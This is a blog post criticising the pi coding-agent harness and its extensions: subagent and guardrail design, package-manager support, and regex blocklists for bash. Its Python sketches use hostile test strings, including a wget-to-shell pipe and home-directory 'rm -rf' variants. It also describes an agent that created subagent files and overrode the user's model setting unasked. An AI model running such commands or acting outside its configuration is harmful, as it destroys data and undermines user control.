Listen, I’m in my agent era, ok? Whether any of it actually works remains to be seen, but we’re all having fun and, after all, that’s what matters, right?

I’ve been using Claude Code for a couple of months now. I’m happy with it and I think it’s good at what it does. But what if? What if I’m overspending? What if I’m missing out? Oh no, not the FOMO!

Long story short: I started wanting something more customizable and extensible. I wanted the “NewShinyThing”™, a bit just because I wanted to tinker, a bit because there were a few things about the inner workings of CC that I actually wanted to tweak. Which made me remember hearing about pi (the tiny harness powering OpenClaw, previously known as Clawdbot and Moltbot) from a blogpost by Armin Ronacher.

His pitch kind of clicked with me: a small coding agent with a minimal set of tools, designed to be extensible and unix-like in nature. It sounded like what I was looking for! I knew going in that it was supposed to be barebones and that I’d have to put in work to get it where I wanted, but honestly that was part of the appeal. I was genuinely excited (I promise!) to sit down and try to make it into something that fit my workflow.

I went ahead, got a monthly Kimi 2.5 subscription, generated my API keys, and loaded pi up.

A blogpost from the creator describes the project as “opinionated and minimal”. As it turns out, the opinions in question are that bash should be enabled by default with no restrictions, that the agent should have access to every file on your machine from the start, and that npm is the only package manager worth supporting. Bold choices.

Look, I don’t want to be rude about it. Probably the software is just not for me. That said, my experience ended up being pretty bad from start to finish and had the side-effect of making me think about the future of vibecoded software as a whole. If you’re even a little like me then maybe this might be worth reading about.

Getting started

I started the way I assume everyone does: the readme open on one monitor, a terminal on the other. I played around with the TUI for a while and then decided that porting over my Claude Code configuration and getting reasonably close to the features I had there was a decent first goal. Nothing crazy, just the most fundamental stuff. Here’s what I needed:

- Parallel subagents within a single session. This is how I do context distillation and is non-negotiable for me.

- A reasonable semblance of security. I’m not someone who leaves 10 agent sessions running overnight, so full sandboxing isn’t my top priority, but I want the basics: if I start the agent in ./folder then anything outside of ./folder should be off limits unless I explicitly allow it, and the same goes for bash where everything not on an allowlist should be blocked by default.

- Ideally some structured integrations with git and github, hooks for worktrees, gh issues etc.
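To make the “anything outside of ./folder is off limits” requirement concrete, here’s a minimal Python sketch of the kind of containment check I have in mind. It is not how Claude Code or pi implement anything; is_inside is a name made up for illustration, and /tmp/folder is just an example root.

```python
from pathlib import Path


def is_inside(root: str, candidate: str) -> bool:
    """Return True if candidate resolves to root itself or a path beneath it."""
    root_path = Path(root).resolve()
    # Joining with an absolute candidate discards root, so "/etc/passwd"
    # is checked as-is rather than as "<root>/etc/passwd".
    target = (root_path / candidate).resolve()
    return target == root_path or root_path in target.parents


print(is_inside("/tmp/folder", "src/main.py"))     # a file under the root
print(is_inside("/tmp/folder", "../secrets.txt"))  # escapes via ".."
print(is_inside("/tmp/folder", "/etc/passwd"))     # absolute path elsewhere
```

Because resolve() normalizes ".." and follows symlinks, a symlink inside the folder that points somewhere else counts as outside. That’s the default I’d want: deny first, allow explicitly.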

I started migrating my old custom commands (which, to be fair, I should just migrate in CC as well, since they are just “skills” now). That part was straightforward, no complaints there.

The subagent problem

Next up: subagents. These don’t exist in core pi. But the documentation points you (after making sure to let you know that you can play doom on pi) to an extension that’s supposed to handle them.

Before I get into the extension itself though, a slight detour. The original blogpost by Mario Zechner (the creator of pi) explains his reasoning for why subagents aren’t built in:

People use sub-agents within a session thinking they’re saving context space, which is true. But that’s the wrong way to think about sub-agents. Using a sub-agent mid-session for context gathering is a sign you didn’t plan ahead. If you need to gather context, do that first in its own session.

This reasoning is genuinely weird to me. He’s essentially saying “Yes, you’re correct that subagents save context. But you know what also saves context? This other method that’s more complicated and more annoying. Therefore you shouldn’t use subagents.”

His actual substantive point is that there’s zero visibility into what a subagent does during execution, and that’s a fair criticism! But observability is not the point of subagents for me. Sometimes I work with multiple knowledge bases and/or on existing codebases with a lot of moving parts, and being able to spawn several subagents that can each go off and fetch information from different KBs or investigate different packages simultaneously is incredibly valuable.

Each one can pursue whatever thread it finds interesting and load whatever it wants into its own context, because I know that, thanks to my setup, only the relevant bits will actually make it back to the parent context. It works surprisingly well in practice, and telling me to do this across separate sessions is just adding extra steps for the sake of philosophical purity. Half the time I don’t even know what I’m looking for until a subagent finds something interesting.
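For anyone who hasn’t used this pattern, here’s a toy Python sketch of what I mean by context distillation. It’s an illustration under heavy assumptions: run_subagent is a hypothetical stand-in for a real model-backed subagent, and the “notes” are fake. The only point is the shape: each subagent builds up a big private context, runs concurrently with the others, and hands back a single short summary.

```python
import asyncio


async def run_subagent(task: str) -> str:
    """Hypothetical stand-in for a real subagent run."""
    # Pretend this is a large private context built up while exploring.
    private_context = [f"raw note {i} about {task}" for i in range(1000)]
    await asyncio.sleep(0)  # yield control, as a real model call would
    # Only a short distilled summary ever leaves the subagent.
    return f"{task}: {len(private_context)} notes distilled to one line"


async def gather_context(tasks: list[str]) -> list[str]:
    """Run all subagents concurrently; the parent only sees their summaries."""
    return await asyncio.gather(*(run_subagent(t) for t in tasks))


summaries = asyncio.run(gather_context(["kb-a", "kb-b", "package-x"]))
for line in summaries:
    print(line)
```

The parent ends up with three lines instead of three thousand notes, and it never had to know in advance which thread would turn out to be the interesting one.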

Anyways, where were we. Subagents.

The pi ecosystem

My search for a subagent extension led me to a search page on npmjs filtered by the pi-package tag, which is how the pi ecosystem organizes its extensions. Cool! I genuinely love browsing extension directories and seeing what sort of interesting stuff people come up with (and wasting precious time installing random crap because “oooh let’s try this!”).

(Although I have to say, for some reason the second most downloaded extension is pi-nes, which I find rather confusing. Sure, it’s a fun project, but its relevance to a coding agent and its position as the “2nd most downloaded” package still elude me.)

There is an important note that I would like to add here. All the extensions are community driven and therefore not part of the actual core of the harness, and not necessarily developed by Mario. That said, they’re all part of the ecosystem, advertised in the project readme, and I would say that the project actively expects you to download them to fill any gaps you might have.

Ok, here it is: pi-subagents.

I open the npm page and start reading.

Installation: pi install npm:pi-subagents

Since I avoid npm whenever I can, I go ahead and try the pnpm equivalent:

~ ❱ pi install pnpm:pi-subagents

Installing pnpm:pi-subagents...

Error: Path does not exist: /home/vi/pnpm:pi-subagents

Turns out you can’t do that and it ends up literally interpreting pnpm:pi-subagents as a file path. When it comes to package managers the installer only knows how to parse npm:, git: and ssh: and treats everything else as a local path. Sigh. Looks like I’ll have to use npm after all (we’ll circle back to this later).
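The behaviour is easy to reproduce in a few lines. The following is a Python sketch of the logic as I observed it from the outside, not pi’s actual code (which is TypeScript and which I’m not quoting here); classify_source and KNOWN_SCHEMES are names invented for the example.

```python
from pathlib import PurePosixPath

# The three prefixes the installer recognised in my testing.
KNOWN_SCHEMES = ("npm", "git", "ssh")


def classify_source(spec: str, cwd: str) -> tuple[str, str]:
    """Split 'scheme:rest' when the scheme is known, else treat spec as a path."""
    scheme, sep, rest = spec.partition(":")
    if sep and scheme in KNOWN_SCHEMES:
        return scheme, rest
    # Anything else falls through to "local path relative to cwd".
    return "path", str(PurePosixPath(cwd) / spec)


print(classify_source("npm:pi-subagents", "/home/vi"))
print(classify_source("pnpm:pi-subagents", "/home/vi"))
```

The second call comes back as a path ending in /home/vi/pnpm:pi-subagents, which is exactly the error message above. An unknown prefix never produces an “unsupported package manager” error because nothing ever checks for one.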

Configuration confusion

I install the package with npm and start moving my existing agent definitions over while reading through the documentation. On the surface, most of it makes sense, but then I notice some things that feel a bit… strange and are explained either poorly or not at all:

output: context.md # writes to {chain_dir}/context.md

defaultReads: context.md # comma-separated files to read

defaultProgress: true # maintain progress.md

interactive: true # (parsed but not enforced in v1)

- So output is the file this subagent writes its results to? Why not just use a temp file?

- I’m guessing defaultReads controls what files the subagent can read to get context from previous agents in a chain?

- defaultProgress seems like it maintains some sort of internal to-do list or progress tracker, but I genuinely have no idea because there is zero mention of what it actually does anywhere in the docs.

- interactive: true is equally mysterious, with that comment being the only documentation. “Parsed but not enforced in v1.” Is it going to be enforced later? Deprecated? The latest release is 0.9.2 according to their own versioning so what does “v1” even refer to here?

This is getting confusing fast.

There’s also this in the readme:

The extension ships with ready-to-use agents — scout, planner, worker, reviewer, context-builder, and researcher. They load at lowest priority so any user or project agent with the same name overrides them. Builtin agents appear with a [builtin] badge in listings and cannot be modified through management actions (create a same-named user agent to override instead).

I thought pi and its tools were supposed to be minimal and extensible. So why is a subagent extension bundling six agents I never asked for that I can’t disable or remove? Or do I have to create a same-named empty agent to effectively disable the builtin one? tl;dr: not what I’d call a clean design.
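Here’s how I read that readme paragraph, as a small Python sketch. This is my interpretation, not the extension’s code: resolve_agents is a made-up name, and the relative order of user versus project agents is an assumption (the readme only says both beat builtins).

```python
# Assumed ordering: higher number wins. Only "builtin is lowest" comes
# from the readme; user-vs-project order is a guess for illustration.
PRIORITY = {"builtin": 0, "user": 1, "project": 2}


def resolve_agents(definitions: list[dict]) -> dict[str, dict]:
    """Later (higher-priority) definitions replace earlier ones by name."""
    resolved: dict[str, dict] = {}
    for definition in sorted(definitions, key=lambda d: PRIORITY[d["source"]]):
        resolved[definition["name"]] = definition
    return resolved


agents = resolve_agents([
    {"name": "scout", "source": "builtin"},
    {"name": "planner", "source": "builtin"},
    {"name": "scout", "source": "user"},
])
print(sorted((name, a["source"]) for name, a in agents.items()))
```

With name-based overriding like this, my scout replaces the builtin one, but planner is still sitting there. The only lever is to shadow each builtin by name; there is no way to say “I don’t want this agent at all”.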

Things start to go wrong

Whatever, I finished moving my agents over. Let’s call /create-plan and see what happens. I ask pi to generate a plan for implementing an MCP orchestrator I’d been working on and…

Uh-oh. Why is it using Haiku when I explicitly set model: kimi-coding/k2p5 in my config? And what is orchestration-designer? I didn’t create that.

~/.p/a/agents 19.2s ❱ ls

code-analyzer.md code-pattern-finder.md knowledge-analyzer.md mcp-researcher.md

code-finder.md codebase-analyzer.md knowledge-finder.md orchestration-designer.md

What is going on? Who put orchestration-designer.md and mcp-researcher.md in my agents directory?

---

name: mcp-researcher

description: Research MCP protocol, available tools, and best practices

for multi-source knowledge retrieval

tools: read, bash, edit, write, subagent

model: claude-haiku-4-5

---

You are a research agent specializing in MCP (Model Context Protocol)

architecture and knowledge retrieval systems. Your task is to research:

1. MCP server architecture and Python SDK

2. Existing open-source MCP servers for Jira, Confluence, and document search

3. Code indexing and search tools (like tree-sitter, ctags, or vector search)

4. PDF processing and search strategies

5. Multi-source query aggregation patterns

For each topic, provide:

- Available tools/libraries with links

- Pros/cons of different approaches

- Specific recommendations for the user's use case

- Code examples where relevant

Be thorough and cite specific libraries, versions, and GitHub repositories.

What is this? I alt-tabbed for a few minutes, and while I was away the agent apparently decided to create its own (absolutely terrible and useless) subagent definitions, override my model selection with Haiku, and start doing god knows what. I still don’t know if this was Kimi going off the rails, pi failing to enforce my config, or the subagents extension’s intended behavior, but this made one thing very clear:

I needed to get command/folder restrictions in place before doing anything else.

The npm sidequest (and the sidequest within the sidequest)

But first, another quick detour. Since 1) I’m usually not a very tidy person when it comes to managing extensions and 2) I prefer using a CLI for doing it, I went ahead and installed pi-extmgr which is basically an extension manager for pi.

Then I ran pi and… sat there staring at my terminal for 10 seconds while npm checked for updates. That’s a one-time thing, right? I closed pi, reopened it. Nope, another 10 seconds of npm doing its thing. Surely there’s an option to disable this, because there’s no way anyone happily waits 10 seconds on every single launch just for an update check.

Well, turns out there’s no explicit “disable” flag, but I found an auto-update setting in the config. I tried setting it to “never” aaand… it still runs the update check on startup. What?

I’ll spare you the full details but this turned into a 30 minute sidequest where I dug into the source, figured out where the update was happening, realized that it was really just happy to run at every startup, without any kind of check, and started putting together a PR to address the issue.
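For reference, this is roughly the behaviour I expected from an auto-update setting, sketched in Python. It is not the patch I wrote and not the extension’s code; the function name, the “never” value as I’ve modelled it, and the once-a-day interval are all assumptions for illustration.

```python
import time
from typing import Optional

# Hypothetical throttle: check at most once a day.
CHECK_INTERVAL_SECONDS = 24 * 60 * 60


def should_check_for_updates(
    setting: str,
    last_check: Optional[float],
    now: Optional[float] = None,
) -> bool:
    """Decide at startup whether an update check should run at all."""
    if setting == "never":
        return False  # the user opted out, so never hit the network
    if last_check is None:
        return True  # no check has ever been recorded
    current = time.time() if now is None else now
    return current - last_check >= CHECK_INTERVAL_SECONDS


print(should_check_for_updates("never", None))
print(should_check_for_updates("daily", 1000.0, now=1060.0))
```

Two conditions, one timestamp. Neither call above would trigger a check: the first because the user said never, the second because the last check was a minute ago.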

Since I was already reading through codebases anyway, this cascaded into a second sidequest (~1.5h this time) where I patched pi-coding-agent to at least allow for pnpm when installing packages, and more generally to provide the framework to support more package managers in the future. It’s basically a 1:1 replacement in every case that matters here and there’s really no technical reason not to support it. I got the patch working, went to open a PR, and discovered that they don’t accept external PRs. And the maintainers are on holiday. Well, unfortunate.

The permissions fiasco

Ok, back to the actual problem. I need permissions and command restrictions. The extension for this is @aliou/pi-guardrails. For reasons that aren’t entirely clear to me this package handles both bash command permissions and .env file protection, but sure, I guess the env file stuff is a bonus.

At this point I’m starting to notice a pattern with the pi ecosystem. At first glance it’s like “Woah”, but then it becomes more like “Ughh”. The documentation looks nice and promising, but then it’s consistently rough and a lot of key information is just missing. But beyond the docs, there are real design problems in this extension that I want to talk about.

The entire permissions system is built on substring or regex matching and defaults to a blocklist. That means every command is allowed unless you explicitly block it, which I find extremely backwards for a security-adjacent feature.

Compare this with Claude Code, which does only glob matching but sets permissions through an allowlist, restricts file access to the current directory by default, has a builtin sandboxing option, and the CLI itself receives frequent security patches. Or look at OpenCode which uses tree-sitter for more accurate command parsing. I’m not saying any of those are 100% bulletproof, but they’re working from fundamentally sounder assumptions than a regex-based blocklist.
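To show why the default matters more than the matching syntax, here’s a Python sketch comparing the two approaches. Neither function is taken from pi-guardrails, Claude Code or OpenCode; the rule lists and function names are hypothetical, and the allowlist is deliberately crude.

```python
import shlex

BLOCKED_SUBSTRINGS = ["rm -rf", "curl"]  # hypothetical blocklist
ALLOWED_PROGRAMS = {"ls", "cat", "git"}  # hypothetical allowlist
SHELL_METACHARACTERS = ";|&`$<>\n"       # anything that chains or substitutes


def blocklist_allows(command: str) -> bool:
    """Default-allow: only commands containing a known-bad substring are stopped."""
    return not any(bad in command for bad in BLOCKED_SUBSTRINGS)


def allowlist_allows(command: str) -> bool:
    """Default-deny: only a single simple command with a known program passes."""
    if any(ch in command for ch in SHELL_METACHARACTERS):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes and similar
        return False
    return bool(argv) and argv[0] in ALLOWED_PROGRAMS


for cmd in ["git status", "rm -r -f ~", "wget http://example.com/x | sh"]:
    print(cmd, blocklist_allows(cmd), allowlist_allows(cmd))
```

The blocklist waves through both rm -r -f ~ and the wget pipe because nobody thought to list them, while the allowlist rejects them without knowing anything about them. The price is false positives (a commit message containing a semicolon gets refused), and allowing a program by name is still nowhere near a sandbox. But when the allowlist gets it wrong, the result is an annoying prompt, not a deleted home directory.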

This implementation seems to also be at least partially inspired by Mario’s rationale:

pi runs in full YOLO mode and assumes you know what you’re doing. It has unrestricted access to your filesystem and can execute any command without permission checks or safety rails. (…) If you look at the security measures in other coding agents, they’re mostly security theater. (…) The only way you could prevent exfiltration of data would be to cut off all network access for the execution environment the agent runs in, which makes the agent mostly useless. An alternative is allow-listing domains, but this can also be worked around through other means. Everybody is running in YOLO mode anyways to get any productive work done, so why not make it the default and only option?

While I appreciate the confidence and delivery, the core claim ends up being a lazy “security is hard so we shouldn’t bother”. He proceeds to misrepresent Simon’s claim (he said the problem is hard but also needs solving!), and finishes with an appeal to common practice which has never been a good engineering argument for anything. (For the record, I am one of those devs doing productive work without YOLO mode)

Overall the full passage reads like a post-hoc justification for a design decision that was made for convenience, dressed up as a principled security stance. Which is fine honestly, his software - his rules, just own it.

Back to the extension. The command matching in pi-guardrails uses regex. Regex matching for bash commands feels like a terrible idea that will inevitably cause more problems than it solves. Bash is not a regular language and you will always have edge cases that slip through or false positives that block legitimate commands. While not perfect, glob is a more straightforward and less error-prone way to do this instead.
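A quick Python demonstration of both failure modes. The pattern below is a hypothetical rule of the kind you might write, not one copied from pi-guardrails, and is_recursive_force_rm is a made-up helper that only understands short flags.

```python
import re
import shlex

# Hypothetical "dangerous command" rule.
DANGEROUS = re.compile(r"\brm\s+-rf\b")

commit = 'git commit -m "never run rm -rf on prod"'
sneaky = "rm -fr ~/projects"

print(bool(DANGEROUS.search(commit)))  # matches text inside a commit message
print(bool(DANGEROUS.search(sneaky)))  # misses the same flags in another order


def is_recursive_force_rm(command: str) -> bool:
    """Token-based check: is this an rm call with both -r/-R and -f?"""
    try:
        argv = shlex.split(command)
    except ValueError:
        return True  # unparseable input is treated as suspicious
    if not argv or argv[0] != "rm":
        return False
    flags: set[str] = set()
    for arg in argv[1:]:
        if arg.startswith("-") and not arg.startswith("--"):
            flags.update(arg[1:])
    return "f" in flags and ("r" in flags or "R" in flags)


print(is_recursive_force_rm(commit))
print(is_recursive_force_rm(sneaky))
```

The regex blocks the harmless commit and lets the destructive command through; the tokenized version gets both right. It is still far from a real bash parser (no long options, pipelines, subshells or variable expansion), which is exactly why this job needs an actual, battle-tested parser and not clever pattern matching.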

The readme also mentions that “all hooks use structural shell parsing via @aliou/sh to avoid false positives from keywords inside commit messages”, which sounds like a good idea in principle, except that @aliou/sh is a three-week-old library, “inspired by mvdan/sh”, that was vibecoded specifically as a dependency for pi-guardrails. I’m sorry, but a brand-new vibecoded bash parsing library backing your security layer does not exactly inspire confidence.

Giving up

This is where I gave up.

I should be fair about a couple of things though.

First, as mentioned before, these extensions (and others that I didn’t mention) are not directly part of pi-agent itself (even though a lot of them are developed by maintainers of the core project). So to be clear, a big part of this rant was about the ecosystem and not the core harness. The core harness is… fine, I guess. We have fundamental disagreements on the overall vision but it mostly does what it says on the box.

Second, yes, I understand that this is supposed to be minimal and do-it-yourself. I was ready to do the work! I even opened two PRs! My problem is that the whole experience just turned out to be incredibly discouraging. Every single thing I tried to do ran into some combination of incomplete docs, questionable design decisions, and dead ends. On top of that, even if I wanted to put in the effort to re-implement the things I needed myself, the extensions documentation seems to be written with LLMs more than humans in mind.

The whole ecosystem, at least from an outsider’s perspective, looks like a sea of projects built by people that don’t want to take the time to understand what they actually built.

Readmes that look promising until you actually start following them, extensions that come with fancy configuration options and switches but deliver the basic functionality in a broken way. It’s the vibes-based development experience in its purest form.



I guess this is the time to remind you that pi-agent is the harness that powers OpenClaw. The tool considered to be a security nightmare [1][2] and that has that questionable [3] social media that ended up having a vibecoded DB vulnerability [4]. The one made by Peter Steinberger, someone who, by his own admission, vibecodes without reading any of his code and has now been hired by OpenAI.

I’m trying to not be bitter about this. I’m sure there are people who just want to spin up agents as fast as possible and don’t care about any of the stuff I care about, and pi is probably great for them. But it’s clearly not for me and watching OpenClaw gain so much traction and realizing that this is the foundation it’s built on, and that this is apparently the direction a big chunk of the ecosystem is moving in… I don’t know, it kind of makes me sad.

Until LLMs become incredibly good, treating vibecoded software as a blind box and assuming that it works just because, on the surface, it does what you asked it to do is a very dangerous way to work and build things.

And remember that even if the LLMs are writing your READMEs, some humans will have to read them too.

Footnotes

1. https://xcancel.com/chiefofautism/status/2024483631067021348

2. https://cacm.acm.org/blogcacm/openclaw-a-k-a-moltbot-is-everywhere-all-at-once-and-a-disaster-waiting-to-happen/

3. https://www.perplexity.ai/page/security-firm-finds-moltbook-s-4J6M_cdYSySFQdnd49tfOQ

4. https://www.404media.co/exposed-moltbook-database-let-anyone-take-control-of-any-ai-agent-on-the-site/